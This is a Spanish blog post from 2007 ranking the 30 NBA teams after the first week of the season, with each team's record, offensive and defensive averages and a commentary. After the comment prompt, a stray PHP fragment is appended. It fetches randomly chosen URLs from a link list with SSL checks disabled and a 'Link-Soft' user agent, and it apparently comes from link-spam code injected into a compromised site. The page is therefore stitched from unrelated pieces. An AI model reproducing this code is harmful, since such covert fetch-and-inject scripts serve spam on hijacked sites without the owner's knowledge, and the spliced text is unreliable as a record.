El termómetro de la NBA

08 de November de 2007 por telekoman

Inauguramos esta sección del blog en la que intentaremos hacer una clasificación global de los 30 equipos que forman la NBA. Esta primera semana la clasificación es exclusivamente en base al balance de victorias / derrotas y no tanto por el juego desplegado, sin embargo a lo largo de la temporada iremos modificando los criterios de ordenación.

Los 5 primeros puestos son para los equipos que han cosechado tres victorias y ninguna derrota. Al frente de la clasificación un equipo del Este, y no el que todos esperábamos. ¿Será posible llegar a la igualdad entre conferencias? Lo iremos viendo semana a semana.

  Equipo Balance Ataque / Defensa Comentario

1
Indiana Pacers 3 – 0 109,0 (4) / 102,0 (21) Nadie se esperaba un rendimiento tan bueno de los Pacers, ni los mismos Pacers. Y menos con Jermaine O’Neal a medio recuperar. Danny Granger es el responsable. Pero deberán ajustar su defensa que con 102 puntos de media es de las peores. Le esperan 3 partidos contra equipos del Este. Deberá dar la talla

2
New Orleans
Hornets
3 – 0 103,3 (7) /
90,3 (6)
Un buen ataque (7) junto a una buena defensa (6) frente a equipos teóricamente inferiores como Portland y Sacramento junto a la victoria sobre Denver han catapultado a los Hornets al segundo puesto. Les espera una larga gira fuera de casa y la visita de San Antonio

3
San Antonio Spurs 3 – 0 102,0 (12) / 92,7 (9) San Antonio coge la directa para intentar revalidar el título del año pasado. Le esperan los Rockets y los Hornets, ambos en buena forma. ¿Podrá Duncan & Co mantener la imbatibilidad?

4
Detroit
Pistons
3 – 0 99,7 (16) /
87,7 (1)
La baja de Hamilton no se ha notado en exceso y Detroit sigue siendo la mejor defensa. La semana que viene Chicago y Seatle intentarán inaugurar su casillero frente a los Pistons. El mejor ataque hasta ahora, Clippers, frente a la mejor defensa. Seguro que saltan chispas.

5
Houston Rockets 3 – 0 96,7 (17) / 89,3 (4) Los Rockets no bajan el nivel en defensa tras su cambio de entrenador y están imbatidos en esta primera semana con McGrady como estandarte ofensivo. Les espera una dura semana ante los gallitos del oeste, Dallas y San Antonio y ante un par del este que no deberían dar problemas. Sólo el horizonte es el límite.

6
L.A. Clippers 2 – 0 117,5 (1) /
107,5 (25)
Son el mejor ataque hasta ahora, pero una de las peores defensas. Tras la baja de Brand los Clippers han aprendido a ganar de la mano de Mobley, Maggette y Kaman.Un Chicago decepcionante y una vuelta por el este para enfrentarse a Indiana, Detroit y Cleveland serán las siguientes piedras de toque.

7
Boston Celtics 2 – 0 100,5 (15) / 89,0 (3) Con sólo dos partidos de Boston se pueden sacar muchas conclusiones. Su ataque es bueno, pero sorprendentemente, su defensa es aún mejor. KG reverdece viejos laureles y comanda a unos Celtics en los que se nota la falta de un base. Siguen en su lucha particular por el este contra Denver, Atlanta y los irregulares Nets.

8
Charlotte
Bobcats
2 – 0 96,0 (18) /
93,5 (11)
Los Bobcats, de la mano de Richardson, Okafor y Felton no conocen la derrota en estos dos partidos, pero les espera una semana muy dura con enfrentamientos ante Phoenix, Indiana y Houston. Pero ahora se rien al estar en un balance positivo de victorias y derrotas, la primera vez en su corta historia.

9
L.A. Lakers 2 – 1 110,3 (3) / 100,7 (19) Los continuos rumores sobre Kobe no han cambiado nada en la ciudad angelina y tras la derrota inicial ante Houston, los Lakers han conseguido meritorias victorias ante Phoenix y Utah. Pero la debilidad es evidente. Se espera sufrimiento en el Staples.

10
Dallas
Mavericks
2 – 1 103,0 (8) /
92,3 (8)
El equipo de Nowitzky empieza otra temporada tras el batacazo de los pasados Playoffs ante los Warriors, y la ha empezado tranquilamente por lo que se dejaron sorprender por Atlanta. Esta semana podrán vengarse de los pupilos de Nelson.

11
Toronto Raptors 2 – 1 102,3 (9) / 88,0 (2) Mitchell no parece encontrar su equipo ideal y las dudas sobre el estado de Garbajosa no contribuyen. Sin embargo Toronto sigue defendiendo muy bien y tiene tiempo para volver a realizar una campaña tan buena como la anterior. Esta semana se mantendrá en el este lo que debería hacer que sus acciones suban.

12
Phoenix Suns 2 – 1 102,3 (9) /
103,3 (23)
La baja de Stoudamire no debería afectar a un equipo que tiene a Nash entre sus filas. Y la derrota ante Lakers debería quedarse en una mera anécdota. Sin embargo deberán incrementar su nivel defensivo si no quieren que en sus visitas a las canchas de Charlotte, Atlanta, Miami y Orlando pinten bastos.

13
Denver Nuggets 2 – 1 102,3 (9) / 95,7 (15)  Tras ganar a equipos en reconstrucción como Seattle y Minnesotta, los Nuggets se toparon con los chicos de Paul que les pararon en seco. A Melo e Iverson se les ha unido un sorprente Camby capaz de llevarse más de 17 rebotes de media. Sin embargo el Oeste es difícil. En su viaje por el este lo tendrán más fácil a priori, aunque les esperan NY, Boston, Washington e Indiana.

14
Orlando Magic 2 – 1 96,0 (18) /
93,7 (12)
Enfrentarse a Detroit es dificíl y eso lo saben bien los chicos de Orlando. Lewis comanda las operaciones como se esperaba y la media de puntos de Howard baja ligeramente, aunque sigue siendo un bastión en el rebote. Junto a ellos, Turkoglu y Nelson son el complemento perfecto. El próximo partido es interesante por el duelo Dwight Howard – Al Jefferson. Y luego no les queda una semana fácil con Toronto, New York y Phoenix en su camino.

15
New Jersey Nets 2 – 1 91,3 (25) / 99,0 (17) La temporada pasada los Nets se distinguieron por su irregularidad, y esta van por el mismo camino. La derrota ante Toronto escoció y mucho. Sin embargo buenas noticias para sus aficionados: Richard Jefferson ha vuelto. A Carter se le espera. Atlanta y Washington deben de servir de entrenamiento para preparar el enfrentamiento ante Boston: Tres para Tres.

16
Utah Jazz 2 – 2 113,5 (2) /
107,8 (27)
El segundo mejor ataque y la cuarta peor defensa. Claro, que tiene trampa. Sus victorias han sido frente a los Warriors, a los que hace tiempo que no se les ha visto defender. Sus derrotas, en especial frente a Lakers, son para mirar con detenimiento. Eso sí, parece que Deron y Boozer están igual que el año pasado y eso es bueno. Cleveland, Seattle y Memphis no deberían ser problema.

17
New York Knicks 1 – 1 101,5 (13) / 101,5 (20) Las dudas sobre la química en NY se van disipando pero poco a poco. Marbury, Crawford, Randolph y Curry son la base de un equipo atacante, pero con una defensa relajada. Denver, Orlando y Miami defienden mejor, pero está por demostrar que sean capaces de ganar a los Knicks. Los neoyorkinos esperan las primeras discrepancias….¿Llegarán?

18
Atlanta Hawks 1 – 1 96,0 (18) /
93,0 (10)
El balance es engañoso, ya que la derrota ante Detroit podría haber sido sin problemas una victoria. Hortford ya ha conseguido meterse en el quinteto inicial e intentar imponer su ley bajo los tableros. Nets, Suns y Celtics seguron que hacen que descubramos el verdadero valor de estos Hawks.

19
Philadelphia 76ers 1 – 2 93,7 (21) / 94,7 (13) Visto el nivel de los Bulls, la victoria en Chicago ha perdido parte de su valor y las derrotas ante Toronto y New Jersey hacen presagiar una temporada dura. Es lo que tienen las reconstrucciones. Iguodala sigue al nivel de la temporada pasada, pero está muy sólo en la ofensiva de los Sixers. Siguen siendo candidatos a estar fuera de playoffs.

20
Cleveland
Cavaliers
1 – 2 92,0 (22) /
100,3 (18)
Perder contra Dallas y Phoenix es previsible, pero también lo es ganar a New York. LeBron todavía no ha conseguido nada espectacular esta temporada, y le queda una semana dura en su viaje por el oeste. Golden State y Sacramento son asequibles; Clippers y Jazz son harina de otro costal.

21
Milwaukee Bucks 1 – 2 86,7 (28) / 92,0 (7) Al igual que Philadelphia, la victoria de los Bucks ante Chicago no es crédito suficiente. Su expansión internacional está asegurada con Yi JianLian, pero eso no es suficiente en una liga tan dura, y el ataque de Milwaukee no es bueno. Toronto, Houston y San Antonio harán que sea casi un infierno.

22
Memphis
Grizzlies
0 – 2 106,0 (6) /
112,5 (28)
Memphis es sin duda un caso raro. Su ataque es bueno, su defensa mala, y encima le ha tocado lidiar con San Antonio e Indiana. Con la integración de Conley y Navarro como asignaturas pendientes, los Grizzlies visitan Seattle y Portland con buenas espectativas para después lidiar con los Jazz.

23
Minnesota Timberwolves 0 – 2 92,0 (22) / 98,0 (16) Perder a tu principal baluarte tanto ofensivo como defensivo no es fácil y aunque Jefferson es una bestia parda, todavía no es Garnett. Esta semana podrán inaugurar su casillero frente a Orlando (dificil), Lakers (posible) o Sacramento (posible).

24
Golden State
Warriors
0 – 3 106,7 (5) /
123,3 (30)
Don Nelson nunca se ha caracterizado por unos equipos con buena defensa, pero estos Warriors son excesivamente blandos. Sí, son grandes en ataque, pero no es posible permitir 123 puntos por partido, aunque dos de ellos sean de Utah. Las buenas noticias vienen de la recuperación de Al Harrington y la revelación de Azubuike, las malas se llaman Lebron y Nowitzky y están ya camino de Oakland

25
Seattle SuperSonics 0 – 3 101,0 (14) / 113,7 (29) El juego rápido de Seattle no le está beneficiando en absoluto y aunque la sospecha de que Durant es ya una de las estrellas de la liga se ha convertido en realidad, la desestructuración del equipo también lo es. Sacramento, Memphis, Utah y Detroit no parecen el bálsamo adecuado para una ciudad que puede que pierda su equipo.

26
Washington
Wizards
0 – 3 91,7 (24) /
105,3 (24)
No se puede esperar mucho de un equipo que está en la posición 24 tanto en ataque como en defensa, pero cuando en tu equipo juega Gilbert Arenas no hay nada imposible. Su rodilla está bajo sospecha y los resultados no ayudan a despejar la niebla. Es posible que los irregulares Nets permitan a Washington poner un 1 en la casilla "Ganados"

27
Sacramento Kings 0 – 3 90,7 (26) / 107,7 (26) Las lesión de Bibby ya la suspensión de Artest lastran mucho al equipo de Sacramento, pero nos han permitido ver en plenitud a Kevin Martin y jóvenes como Francisco García que lo están haciendo bastante bien. Podrán rehacerse esta semana en la que recibirán a tres equipos del Este y en la que deberían ganar al menos 2 de sus 3 partidos.

28
Portland
TrailBlazers
0 – 3 90,0 (27) /
102,7 (22)
El proyecto Portland de este año no tiene ningún futuro tras la lesión de Oden, y haber empezado visitando a tres equipos de entre los 5 primeros de nuestra lista no mejora el panorama. Aldrige, Roy y Webster no es mala base, … para dentro de un par de años cuando Oden pueda situarse entre los grandes. Recibir ahora a Hornets, Grizzlies y Maverics ofrece pocas esperanzas.

29
Chicago Bulls 0 – 3 86,7 (28) / 95,3 (14) Tras perder ante equipos teóricamente inferiores, la semana de Chicago es oscura cuanto menos ya que reciben a Clippers, Pistons y Raptors. Sin embargo este equipo deberá en algún momento hacer frente a los rumores y demostrar el equipo que todo el mundo sabe que es.

30
Miami Heat 0 – 3 84,3 (30) /
89,3 (4)
La baja de Wade y los años de Shaq son una mala combinación para cualquier equipo. Curiosamente su defensa es de las mejores, pero les falta una referencia clara en el ataque. Si Wade se recupera esto cambiará seguro, por lo que San Antonio, Phoenix y New York seguro que rezan para que no se produzca.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>